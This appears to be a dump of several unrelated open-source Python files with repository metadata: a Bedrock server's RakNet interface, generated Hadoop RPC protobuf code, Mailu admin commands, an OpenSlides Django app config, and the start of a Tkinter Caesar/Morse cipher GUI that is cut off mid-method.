251e027840648bd7ad225b2cb161fd768e750f36 | 5,473 | py | Python | podrum/interface/rak_net_interface.py | NotKonishi/Podrum | df6ea1a596bf3a44e7e4f580f12a352bd37f4aaf | [
"MIT"
] | null | null | null | podrum/interface/rak_net_interface.py | NotKonishi/Podrum | df6ea1a596bf3a44e7e4f580f12a352bd37f4aaf | [
"MIT"
] | null | null | null | podrum/interface/rak_net_interface.py | NotKonishi/Podrum | df6ea1a596bf3a44e7e4f580f12a352bd37f4aaf | [
"MIT"
] | null | null | null | ################################################################################
# #
# ____ _ #
# | _ \ ___ __| |_ __ _ _ _ __ ___ #
# | |_) / _ \ / _` | '__| | | | '_ ` _ \ #
# | __/ (_) | (_| | | | |_| | | | | | | #
# |_| \___/ \__,_|_| \__,_|_| |_| |_| #
# #
# Copyright 2021 Podrum Studios #
# #
# Permission is hereby granted, free of charge, to any person #
# obtaining a copy of this software and associated documentation #
# files (the "Software"), to deal in the Software without restriction, #
# including without limitation the rights to use, copy, modify, merge, #
# publish, distribute, sublicense, and/or sell copies of the Software, #
# and to permit persons to whom the Software is furnished to do so, #
# subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included #
# in all copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING #
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS #
# IN THE SOFTWARE. #
# #
################################################################################
from constant.version import version
from packet.mcbe.game_packet import game_packet
from player.bedrock_player import bedrock_player
from rak_net.server import server as rak_net_server
from threading import Thread
class rak_net_interface(Thread):
    """Network interface thread bridging the RakNet transport to the server.

    Maintains the advertised MCPE status string (motd, player counts) and
    translates RakNet connection events into bedrock_player lifecycle calls.
    """

    def __init__(self, server: object) -> None:
        super().__init__()
        self.server: object = server
        # Bind the RakNet listener to the configured hostname/port.
        self.rak_net_server: object = rak_net_server(
            server.config.data["ip_address"]["hostname"],
            server.config.data["ip_address"]["port"],
        )
        self.rak_net_server.interface = self
        # Initialized here so run() is safe even if invoked before
        # start_interface() (the original only set this in start_interface).
        self.stopped: bool = True
        self.set_status(server.config.data["motd"], 0, server.config.data["max_players"])

    def _status_fields(self) -> list:
        """Split the advertised status string into its semicolon-separated fields."""
        return self.rak_net_server.name.split(";")

    def get_count(self) -> int:
        """Return the online player count advertised in the status string."""
        return int(self._status_fields()[4])

    def get_max_count(self) -> int:
        """Return the maximum player count advertised in the status string."""
        return int(self._status_fields()[5])

    def get_motd(self) -> str:
        """Return the message of the day advertised in the status string."""
        return self._status_fields()[1]

    def set_status(self, motd: str, count: int, max_count: int) -> None:
        """Rebuild the advertised MCPE status string from its components."""
        self.rak_net_server.name = (
            f"MCPE;{motd};{version.mcbe_protocol_version};"
            f"{version.mcbe_version};{count};{max_count};0;"
        )

    def set_motd(self, motd: str) -> None:
        """Change only the motd, preserving the current counts."""
        self.set_status(motd, self.get_count(), self.get_max_count())

    def set_count(self, count: int) -> None:
        """Change only the online player count."""
        self.set_status(self.get_motd(), count, self.get_max_count())

    def set_max_count(self, max_count: int) -> None:
        """Change only the maximum player count."""
        self.set_status(self.get_motd(), self.get_count(), max_count)

    def on_frame(self, packet: object, connection: object) -> None:
        """Decode a RakNet frame and feed game packets to the owning player."""
        if connection.address.token in self.server.players:
            if packet.body[0] == 0xfe:  # 0xfe marks a batched MCBE game packet
                new_packet: object = game_packet(packet.body)
                new_packet.decode()
                packets: list = new_packet.read_packets_data()
                for batch in packets:
                    # NOTE(review): debug trace kept to preserve observable output.
                    print(f'[Packet]: {hex(batch[0])}')
                    self.server.players[connection.address.token].handle_packet(batch)

    def on_new_incoming_connection(self, connection: object) -> None:
        """Create a bedrock_player for the new connection and update the count."""
        self.server.players[connection.address.token] = bedrock_player(connection, self.server)
        self.server.players[connection.address.token].entity_id = self.server.current_entity_id
        self.server.current_entity_id += 1
        self.set_count(len(self.server.players))
        self.server.logger.info(f"{connection.address.token} connected.")

    def on_disconnect(self, connection: object) -> None:
        """Drop the player for a closed connection and update the count."""
        del self.server.players[connection.address.token]
        self.set_count(len(self.server.players))
        self.server.logger.info(f"{connection.address.token} disconnected.")

    def start_interface(self) -> None:
        """Start the RakNet handling loop in this thread."""
        self.stopped = False
        self.start()

    def stop_interface(self) -> None:
        """Ask the handling loop to exit after the current iteration."""
        self.stopped = True

    def run(self):
        # Thread body: pump the RakNet server until asked to stop.
        while not self.stopped:
            self.rak_net_server.handle()
| 53.656863 | 140 | 0.529874 | 574 | 5,473 | 4.818815 | 0.303136 | 0.050615 | 0.043384 | 0.040492 | 0.283442 | 0.23355 | 0.154013 | 0.135213 | 0.135213 | 0.095445 | 0 | 0.003624 | 0.344601 | 5,473 | 101 | 141 | 54.188119 | 0.767494 | 0.359035 | 0 | 0.089286 | 0 | 0 | 0.078425 | 0.045884 | 0 | 0 | 0.001302 | 0 | 0 | 1 | 0.25 | false | 0 | 0.089286 | 0 | 0.410714 | 0.017857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
251e8a2852936ddefe54d8eec8adb2bfef6d68d2 | 6,867 | py | Python | snakebite/protobuf/RpcPayloadHeader_pb2.py | cglewis/snakebite | 98bb423d5fed9803e94782e93a3a7b8ca8d46fc8 | [
"Apache-2.0"
] | 1 | 2020-09-06T09:30:01.000Z | 2020-09-06T09:30:01.000Z | snakebite/protobuf/RpcPayloadHeader_pb2.py | cglewis/snakebite | 98bb423d5fed9803e94782e93a3a7b8ca8d46fc8 | [
"Apache-2.0"
] | null | null | null | snakebite/protobuf/RpcPayloadHeader_pb2.py | cglewis/snakebite | 98bb423d5fed9803e94782e93a3a7b8ca8d46fc8 | [
"Apache-2.0"
] | null | null | null | # Generated by the protocol buffer compiler. DO NOT EDIT!
from google.protobuf import descriptor
from google.protobuf import message
from google.protobuf import reflection
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
DESCRIPTOR = descriptor.FileDescriptor(
name='RpcPayloadHeader.proto',
package='',
serialized_pb='\n\x16RpcPayloadHeader.proto\"q\n\x15RpcPayloadHeaderProto\x12\x1e\n\x07rpcKind\x18\x01 \x01(\x0e\x32\r.RpcKindProto\x12(\n\x05rpcOp\x18\x02 \x01(\x0e\x32\x19.RpcPayloadOperationProto\x12\x0e\n\x06\x63\x61llId\x18\x03 \x02(\r\"f\n\x16RpcResponseHeaderProto\x12\x0e\n\x06\x63\x61llId\x18\x01 \x02(\r\x12\x1f\n\x06status\x18\x02 \x02(\x0e\x32\x0f.RpcStatusProto\x12\x1b\n\x13serverIpcVersionNum\x18\x03 \x01(\r*J\n\x0cRpcKindProto\x12\x0f\n\x0bRPC_BUILTIN\x10\x00\x12\x10\n\x0cRPC_WRITABLE\x10\x01\x12\x17\n\x13RPC_PROTOCOL_BUFFER\x10\x02*i\n\x18RpcPayloadOperationProto\x12\x15\n\x11RPC_FINAL_PAYLOAD\x10\x00\x12\x1c\n\x18RPC_CONTINUATION_PAYLOAD\x10\x01\x12\x18\n\x14RPC_CLOSE_CONNECTION\x10\x02*3\n\x0eRpcStatusProto\x12\x0b\n\x07SUCCESS\x10\x00\x12\t\n\x05\x45RROR\x10\x01\x12\t\n\x05\x46\x41TAL\x10\x02\x42;\n\x1eorg.apache.hadoop.ipc.protobufB\x16RpcPayloadHeaderProtos\xa0\x01\x01')
_RPCKINDPROTO = descriptor.EnumDescriptor(
name='RpcKindProto',
full_name='RpcKindProto',
filename=None,
file=DESCRIPTOR,
values=[
descriptor.EnumValueDescriptor(
name='RPC_BUILTIN', index=0, number=0,
options=None,
type=None),
descriptor.EnumValueDescriptor(
name='RPC_WRITABLE', index=1, number=1,
options=None,
type=None),
descriptor.EnumValueDescriptor(
name='RPC_PROTOCOL_BUFFER', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=245,
serialized_end=319,
)
_RPCPAYLOADOPERATIONPROTO = descriptor.EnumDescriptor(
name='RpcPayloadOperationProto',
full_name='RpcPayloadOperationProto',
filename=None,
file=DESCRIPTOR,
values=[
descriptor.EnumValueDescriptor(
name='RPC_FINAL_PAYLOAD', index=0, number=0,
options=None,
type=None),
descriptor.EnumValueDescriptor(
name='RPC_CONTINUATION_PAYLOAD', index=1, number=1,
options=None,
type=None),
descriptor.EnumValueDescriptor(
name='RPC_CLOSE_CONNECTION', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=321,
serialized_end=426,
)
_RPCSTATUSPROTO = descriptor.EnumDescriptor(
name='RpcStatusProto',
full_name='RpcStatusProto',
filename=None,
file=DESCRIPTOR,
values=[
descriptor.EnumValueDescriptor(
name='SUCCESS', index=0, number=0,
options=None,
type=None),
descriptor.EnumValueDescriptor(
name='ERROR', index=1, number=1,
options=None,
type=None),
descriptor.EnumValueDescriptor(
name='FATAL', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=428,
serialized_end=479,
)
RPC_BUILTIN = 0
RPC_WRITABLE = 1
RPC_PROTOCOL_BUFFER = 2
RPC_FINAL_PAYLOAD = 0
RPC_CONTINUATION_PAYLOAD = 1
RPC_CLOSE_CONNECTION = 2
SUCCESS = 0
ERROR = 1
FATAL = 2
_RPCPAYLOADHEADERPROTO = descriptor.Descriptor(
name='RpcPayloadHeaderProto',
full_name='RpcPayloadHeaderProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(
name='rpcKind', full_name='RpcPayloadHeaderProto.rpcKind', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='rpcOp', full_name='RpcPayloadHeaderProto.rpcOp', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='callId', full_name='RpcPayloadHeaderProto.callId', index=2,
number=3, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=26,
serialized_end=139,
)
_RPCRESPONSEHEADERPROTO = descriptor.Descriptor(
name='RpcResponseHeaderProto',
full_name='RpcResponseHeaderProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(
name='callId', full_name='RpcResponseHeaderProto.callId', index=0,
number=1, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='status', full_name='RpcResponseHeaderProto.status', index=1,
number=2, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='serverIpcVersionNum', full_name='RpcResponseHeaderProto.serverIpcVersionNum', index=2,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=141,
serialized_end=243,
)
_RPCPAYLOADHEADERPROTO.fields_by_name['rpcKind'].enum_type = _RPCKINDPROTO
_RPCPAYLOADHEADERPROTO.fields_by_name['rpcOp'].enum_type = _RPCPAYLOADOPERATIONPROTO
_RPCRESPONSEHEADERPROTO.fields_by_name['status'].enum_type = _RPCSTATUSPROTO
DESCRIPTOR.message_types_by_name['RpcPayloadHeaderProto'] = _RPCPAYLOADHEADERPROTO
DESCRIPTOR.message_types_by_name['RpcResponseHeaderProto'] = _RPCRESPONSEHEADERPROTO
class RpcPayloadHeaderProto(message.Message):
    """Generated protobuf message for the RPC request payload header.

    Fields (rpcKind, rpcOp, callId) are populated from DESCRIPTOR by the
    GeneratedProtocolMessageType metaclass (legacy Python 2 protobuf API).
    Auto-generated file: do not edit by hand.
    """
    __metaclass__ = reflection.GeneratedProtocolMessageType
    DESCRIPTOR = _RPCPAYLOADHEADERPROTO

    # @@protoc_insertion_point(class_scope:RpcPayloadHeaderProto)
class RpcResponseHeaderProto(message.Message):
    """Generated protobuf message for the RPC response header.

    Fields (callId, status, serverIpcVersionNum) are populated from
    DESCRIPTOR by the GeneratedProtocolMessageType metaclass (legacy
    Python 2 protobuf API). Auto-generated file: do not edit by hand.
    """
    __metaclass__ = reflection.GeneratedProtocolMessageType
    DESCRIPTOR = _RPCRESPONSEHEADERPROTO

    # @@protoc_insertion_point(class_scope:RpcResponseHeaderProto)
# @@protoc_insertion_point(module_scope)
| 33.014423 | 904 | 0.745886 | 816 | 6,867 | 6.069853 | 0.193627 | 0.051686 | 0.039976 | 0.034525 | 0.528367 | 0.485968 | 0.451645 | 0.442358 | 0.429235 | 0.401777 | 0 | 0.049341 | 0.138197 | 6,867 | 207 | 905 | 33.173913 | 0.787597 | 0.036406 | 0 | 0.572222 | 1 | 0.005556 | 0.227953 | 0.194524 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022222 | 0 | 0.055556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
252bfe0a0bcfd5b730fdf638e6a25a62796892a0 | 5,441 | py | Python | admin/manage.py | agglrx/Mailu | a880bc908ecdfedcd1eb0d5f3782c74f4f0f4506 | [
"MIT"
] | null | null | null | admin/manage.py | agglrx/Mailu | a880bc908ecdfedcd1eb0d5f3782c74f4f0f4506 | [
"MIT"
] | null | null | null | admin/manage.py | agglrx/Mailu | a880bc908ecdfedcd1eb0d5f3782c74f4f0f4506 | [
"MIT"
] | null | null | null | from mailu import app, manager, db
from mailu.admin import models
@manager.command
def admin(localpart, domain_name, password):
    """Create a global administrator account in the given domain."""
    domain = models.Domain.query.get(domain_name)
    if domain is None:
        # Stage a new domain when it does not exist yet.
        domain = models.Domain(name=domain_name)
        db.session.add(domain)
    account = models.User(localpart=localpart, domain=domain, global_admin=True)
    account.set_password(password)
    db.session.add(account)
    db.session.commit()
@manager.command
def user(localpart, domain_name, password, hash_scheme=app.config['PASSWORD_SCHEME']):
    """Create a regular (non-admin) user in the given domain."""
    domain = models.Domain.query.get(domain_name)
    if domain is None:
        # Stage a new domain when it does not exist yet.
        domain = models.Domain(name=domain_name)
        db.session.add(domain)
    account = models.User(localpart=localpart, domain=domain, global_admin=False)
    account.set_password(password, hash_scheme=hash_scheme)
    db.session.add(account)
    db.session.commit()
@manager.command
def user_import(localpart, domain_name, password_hash, hash_scheme=app.config['PASSWORD_SCHEME']):
    """Import a user along with password hash. Available hashes:
    'SHA512-CRYPT'
    'SHA256-CRYPT'
    'MD5-CRYPT'
    'CRYPT'
    """
    domain = models.Domain.query.get(domain_name)
    if domain is None:
        # Stage a new domain when it does not exist yet.
        domain = models.Domain(name=domain_name)
        db.session.add(domain)
    account = models.User(localpart=localpart, domain=domain, global_admin=False)
    # raw=True stores the pre-computed hash instead of hashing the input.
    account.set_password(password_hash, hash_scheme=hash_scheme, raw=True)
    db.session.add(account)
    db.session.commit()
def _get_or_create_domain(domain_name):
    """Fetch a Domain by name, staging a new one in the session if missing."""
    domain = models.Domain.query.get(domain_name)
    if not domain:
        domain = models.Domain(name=domain_name)
        db.session.add(domain)
    return domain


def _sync_user(user_config, tracked_users):
    """Create or update one user from its YAML mapping and record its email."""
    localpart = user_config['localpart']
    domain_name = user_config['domain']
    password_hash = user_config['password_hash']
    hash_scheme = user_config['hash_scheme']
    domain = _get_or_create_domain(domain_name)
    email = '{0}@{1}'.format(localpart, domain_name)
    tracked_users.add(email)
    user = models.User.query.get(email)
    if not user:
        user = models.User(
            localpart=localpart,
            domain=domain,
            global_admin=False
        )
    # Password is (re)applied even for existing users so the YAML wins.
    user.set_password(password_hash, hash_scheme=hash_scheme, raw=True)
    db.session.add(user)


def _sync_alias(alias_config, tracked_aliases):
    """Create or update one alias from its YAML mapping and record its email."""
    localpart = alias_config['localpart']
    domain_name = alias_config['domain']
    destination = alias_config['destination']
    domain = _get_or_create_domain(domain_name)
    email = '{0}@{1}'.format(localpart, domain_name)
    tracked_aliases.add(email)
    alias = models.Alias.query.get(email)
    if not alias:
        alias = models.Alias(
            localpart=localpart,
            domain=domain,
            destination=destination.split(','),
            email=email
        )
    else:
        alias.destination = destination.split(',')
    db.session.add(alias)


def _prune_untracked(tracked_users, tracked_aliases):
    """Delete users and aliases that are absent from the imported config."""
    for user in db.session.query(models.User).all():
        if user.email not in tracked_users:
            db.session.delete(user)
    for alias in db.session.query(models.Alias).all():
        if alias.email not in tracked_aliases:
            db.session.delete(alias)


@manager.command
def config_update(delete_objects=False):
    """sync configuration with data from YAML-formatted stdin"""
    import yaml, sys
    # NOTE(review): yaml.load without an explicit Loader can construct
    # arbitrary Python objects; prefer yaml.safe_load if stdin is not trusted.
    new_config = yaml.load(sys.stdin)
    tracked_users = set()
    for user_config in new_config['users']:
        _sync_user(user_config, tracked_users)
    tracked_aliases = set()
    for alias_config in new_config['aliases']:
        _sync_alias(alias_config, tracked_aliases)
    if delete_objects:
        # Only prune when explicitly requested; default is additive sync.
        _prune_untracked(tracked_users, tracked_aliases)
    db.session.commit()
@manager.command
def user_delete(email):
    """delete user"""
    account = models.User.query.get(email)
    if account is not None:
        db.session.delete(account)
    db.session.commit()
@manager.command
def alias_delete(email):
    """delete alias"""
    existing = models.Alias.query.get(email)
    if existing is not None:
        db.session.delete(existing)
    db.session.commit()
@manager.command
def alias(localpart, domain_name, destination):
    """Create an alias that forwards to one or more destinations."""
    domain = models.Domain.query.get(domain_name)
    if domain is None:
        # Stage a new domain when it does not exist yet.
        domain = models.Domain(name=domain_name)
        db.session.add(domain)
    # destination is a comma-separated list on the command line.
    new_alias = models.Alias(
        localpart=localpart,
        domain=domain,
        destination=destination.split(','),
        email="%s@%s" % (localpart, domain_name)
    )
    db.session.add(new_alias)
    db.session.commit()
# Set limits to a domain
@manager.command
def setlimits(domain_name, max_users, max_aliases, max_quota_bytes):
    """Set the user, alias and quota limits of an existing domain."""
    domain = models.Domain.query.get(domain_name)
    domain.max_users, domain.max_aliases, domain.max_quota_bytes = (
        max_users, max_aliases, max_quota_bytes
    )
    db.session.add(domain)
    db.session.commit()
# Make the user manager of a domain
@manager.command
def setmanager(domain_name, user_name='manager'):
    """Grant the given user (localpart) manager rights over the domain."""
    domain = models.Domain.query.get(domain_name)
    manager_account = models.User.query.get(user_name + '@' + domain_name)
    domain.managers.append(manager_account)
    db.session.add(domain)
    db.session.commit()
# Entry point: run the Flask-Script command dispatcher.
if __name__ == "__main__":
    manager.run()
| 30.396648 | 98 | 0.638669 | 661 | 5,441 | 5.108926 | 0.12708 | 0.094759 | 0.074622 | 0.054486 | 0.58928 | 0.538348 | 0.494522 | 0.438851 | 0.438851 | 0.438851 | 0 | 0.002691 | 0.248851 | 5,441 | 178 | 99 | 30.567416 | 0.823587 | 0.060283 | 0 | 0.604167 | 0 | 0 | 0.029058 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0.055556 | 0.027778 | 0 | 0.090278 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
252c44b3659adf626a1bf74137b1ac5bb437e4d0 | 1,697 | py | Python | openslides/mediafiles/apps.py | boehlke/OpenSlides | 7a64fb83ebda2cb41706f62d7cfc5a63dbcab4a2 | [
"MIT"
] | null | null | null | openslides/mediafiles/apps.py | boehlke/OpenSlides | 7a64fb83ebda2cb41706f62d7cfc5a63dbcab4a2 | [
"MIT"
] | null | null | null | openslides/mediafiles/apps.py | boehlke/OpenSlides | 7a64fb83ebda2cb41706f62d7cfc5a63dbcab4a2 | [
"MIT"
] | null | null | null | from typing import Any, Dict, Set
from django.apps import AppConfig
class MediafilesAppConfig(AppConfig):
    """App configuration for the OpenSlides mediafiles app.

    ready() wires up signals, the projector element and the REST viewset
    once the Django app registry is populated.
    """

    name = "openslides.mediafiles"
    verbose_name = "OpenSlides Mediafiles"
    # Tells the client loader that this app ships an Angular site module.
    angular_site_module = True

    def ready(self):
        # Import all required stuff. Imports are local so nothing touches
        # models/signals before the app registry is fully populated.
        from openslides.core.signals import permission_change
        from openslides.utils.rest_api import router
        from .projector import register_projector_elements
        from .signals import get_permission_change_data
        from .views import MediafileViewSet
        from . import serializers  # noqa
        from ..utils.access_permissions import required_user

        # Define projector elements.
        register_projector_elements()

        # Connect signals.
        permission_change.connect(
            get_permission_change_data,
            dispatch_uid="mediafiles_get_permission_change_data",
        )

        # Register viewsets.
        router.register(
            self.get_model("Mediafile").get_collection_string(), MediafileViewSet
        )

        # register required_users (the module-level function defined below
        # in this file).
        required_user.add_collection_string(
            self.get_model("Mediafile").get_collection_string(), required_users
        )

    def get_startup_elements(self):
        """
        Yields all Cachables required on startup i. e. opening the websocket
        connection.
        """
        yield self.get_model("Mediafile")
def required_users(element: Dict[str, Any]) -> Set[int]:
    """
    Returns all user ids that are displayed as uploaders in any mediafile
    if request_user can see mediafiles. This function may return an empty
    set.
    """
    uploader = element["uploader_id"]
    # A bare int FK id would make set(<int>) raise TypeError ('int' is not
    # iterable); accept both a single id and an iterable of ids.
    if isinstance(uploader, int):
        return {uploader}
    return set(uploader)
| 30.854545 | 81 | 0.677666 | 186 | 1,697 | 5.967742 | 0.483871 | 0.072072 | 0.051351 | 0.062162 | 0.072072 | 0.072072 | 0.072072 | 0 | 0 | 0 | 0 | 0 | 0.255156 | 1,697 | 54 | 82 | 31.425926 | 0.878165 | 0.2033 | 0 | 0 | 0 | 0 | 0.090557 | 0.044892 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103448 | false | 0 | 0.310345 | 0 | 0.586207 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
25324e38ee50c1cc55d682bc632801300c8229ca | 13,424 | py | Python | cryptography_playground.py | GabrielAlves/CryptographyPlayground | eae2048939b09e852ccf3424683462130c4f3ee9 | [
"MIT"
] | null | null | null | cryptography_playground.py | GabrielAlves/CryptographyPlayground | eae2048939b09e852ccf3424683462130c4f3ee9 | [
"MIT"
] | null | null | null | cryptography_playground.py | GabrielAlves/CryptographyPlayground | eae2048939b09e852ccf3424683462130c4f3ee9 | [
"MIT"
] | null | null | null | import tkinter as tk
from tkinter import ttk
from tkinter import scrolledtext
from tkinter import messagebox as msg
from tkinter import Menu
from i18n.i18n_cryptography_playground import I18NCryptographyPlayground
from i18n.i18n_message_box import I18NMessageBox
from gui_settings import GUISettings
from cryptography_algorithms.morse import Morse
from cryptography_algorithms.caesar import Caesar
from about_project_view import AboutProjectView
class CryptographyPlayground:
def __init__(self):
self.create_widgets()
def create_widgets(self):
self.create_window()
self.create_menu()
self.create_tabs()
self.create_widgets_of_coding_tab()
self.create_widgets_of_decoding_tab()
def define_gui_settings(self):
self.gui_settings = GUISettings()
def create_window(self):
self.window = tk.Tk()
self.configure_window()
def define_gui_language(self):
self.i18n_cryptography_playground = I18NCryptographyPlayground("en")
self.i18n_message_box = I18NMessageBox("en")
def configure_window(self):
self.define_gui_settings()
self.define_gui_language()
self.window.title(self.i18n_cryptography_playground.window_title)
self.window.iconbitmap(self.window, "images/icons/lock_icon.ico")
self.window.resizable(False, False)
def create_menu(self):
self.create_menu_bar()
self.create_file_menu_item()
self.create_help_menu_item()
def create_menu_bar(self):
self.menu_bar = Menu(self.window)
self.window.configure(menu = self.menu_bar)
def create_file_menu_item(self):
self.file_menu = Menu(self.menu_bar, tearoff = 0)
self.file_menu.add_command(label = self.i18n_cryptography_playground.menu_file_new_label, command = self.open_new_window)
self.file_menu.add_command(label = self.i18n_cryptography_playground.menu_file_exit_label, command = self.close_window)
self.menu_bar.add_cascade(label = self.i18n_cryptography_playground.menu_file_label, menu = self.file_menu)
def create_help_menu_item(self):
self.help_menu = Menu(self.menu_bar, tearoff = 0)
self.help_menu.add_command(label = self.i18n_cryptography_playground.menu_help_about_label, command = AboutProjectView)
self.menu_bar.add_cascade(label = self.i18n_cryptography_playground.menu_help_label, menu = self.help_menu)
def create_tabs(self):
self.create_tab_control()
self.create_coding_tab()
self.create_decoding_tab()
self.manage_tab_control()
def create_tab_control(self):
self.tab_control = ttk.Notebook(self.window)
def create_coding_tab(self):
self.coding_tab = ttk.Frame(self.tab_control)
self.tab_control.add(self.coding_tab, text = self.i18n_cryptography_playground.coding_tab_text)
def create_decoding_tab(self):
self.decoding_tab = ttk.Frame(self.tab_control)
self.tab_control.add(self.decoding_tab, text = self.i18n_cryptography_playground.decoding_tab_text)
def manage_tab_control(self):
self.tab_control.pack(expand = 1, fill = "both")
def create_widgets_of_coding_tab(self):
self.create_coding_section_labelframe()
self.create_widgets_from_coding_section_labelframe()
self.create_encryption_options_labelframe()
self.create_buttons_from_encryption_options()
def create_coding_section_labelframe(self):
self.coding_labelframe = ttk.LabelFrame(self.coding_tab, text = self.i18n_cryptography_playground.coding_section_labelframe)
self.coding_labelframe.grid(row = 0, padx = self.gui_settings.coding_section_padding_width, pady = self.gui_settings.padding_height)
def create_widgets_from_coding_section_labelframe(self):
self.create_label_for_message_to_be_encrypted()
self.create_scrolledtext_for_message_to_be_encrypted()
self.create_label_for_encrypted_message()
self.create_scrolledtext_for_encrypted_message()
def create_label_for_message_to_be_encrypted(self):
self.label_for_message_to_be_encrypted = ttk.Label(self.coding_labelframe, text = self.i18n_cryptography_playground.label_for_message_to_be_encrypted, font = (self.gui_settings.font_family, self.gui_settings.font_size))
self.label_for_message_to_be_encrypted.grid(row = 1)
def create_scrolledtext_for_message_to_be_encrypted(self):
self.scrolledtext_for_message_to_be_encrypted = scrolledtext.ScrolledText(self.coding_labelframe, width = self.gui_settings.scrolledtext_width, height = self.gui_settings.scrolledtext_height, font = (self.gui_settings.font_family, self.gui_settings.font_size), wrap = tk.WORD)
self.scrolledtext_for_message_to_be_encrypted.grid(row = 2, pady = self.gui_settings.padding_height)
self.scrolledtext_for_message_to_be_encrypted.focus()
def create_label_for_encrypted_message(self):
self.label_encrypted_message = ttk.Label(self.coding_labelframe, text = self.i18n_cryptography_playground.label_encrypted_message, font = (self.gui_settings.font_family, self.gui_settings.font_size))
self.label_encrypted_message.grid(row = 3)
def create_scrolledtext_for_encrypted_message(self):
self.scrolledtext_for_encrypted_message = scrolledtext.ScrolledText(self.coding_labelframe, width = self.gui_settings.scrolledtext_width, height = self.gui_settings.scrolledtext_height, font = (self.gui_settings.font_family, self.gui_settings.font_size), wrap = tk.WORD)
self.scrolledtext_for_encrypted_message.grid(row = 4, pady = self.gui_settings.padding_height)
def create_encryption_options_labelframe(self):
self.coding_tab_cryptography_options = ttk.LabelFrame(self.coding_labelframe, text = self.i18n_cryptography_playground.cryptography_options)
self.coding_tab_cryptography_options.grid(row = 5, pady = self.gui_settings.padding_height, sticky = tk.W)
def create_buttons_from_encryption_options(self):
self.create_caesar_encryption_button()
self.create_morse_encryption_button()
self.add_padding_to_encryption_buttons()
def create_caesar_encryption_button(self):
self.button_caesar_cryptography = ttk.Button(self.coding_tab_cryptography_options, text = self.i18n_cryptography_playground.caesar_cryptography_button_text, command = lambda : self.process_message(Caesar, "encrypt", self.scrolledtext_for_message_to_be_encrypted, self.scrolledtext_for_encrypted_message))
self.button_caesar_cryptography.grid(column = 0, row = 0, sticky = tk.W)
def create_morse_encryption_button(self):
self.button_morse_cryptography = ttk.Button(self.coding_tab_cryptography_options, text = self.i18n_cryptography_playground.morse_cryptography_button_text, command = lambda : self.process_message(Morse, "encrypt", self.scrolledtext_for_message_to_be_encrypted, self.scrolledtext_for_encrypted_message))
self.button_morse_cryptography.grid(column = 1, row = 0, sticky = tk.W)
def add_padding_to_encryption_buttons(self):
for button in self.coding_tab_cryptography_options.winfo_children():
button.grid_configure(padx = self.gui_settings.padding_width, pady = self.gui_settings.padding_height)
def create_widgets_of_decoding_tab(self):
self.create_decoding_section_labelframe()
self.create_widgets_from_decoding_section_labelframe()
self.create_decryption_options_labelframe()
self.create_buttons_from_decryption_options()
def create_decoding_section_labelframe(self):
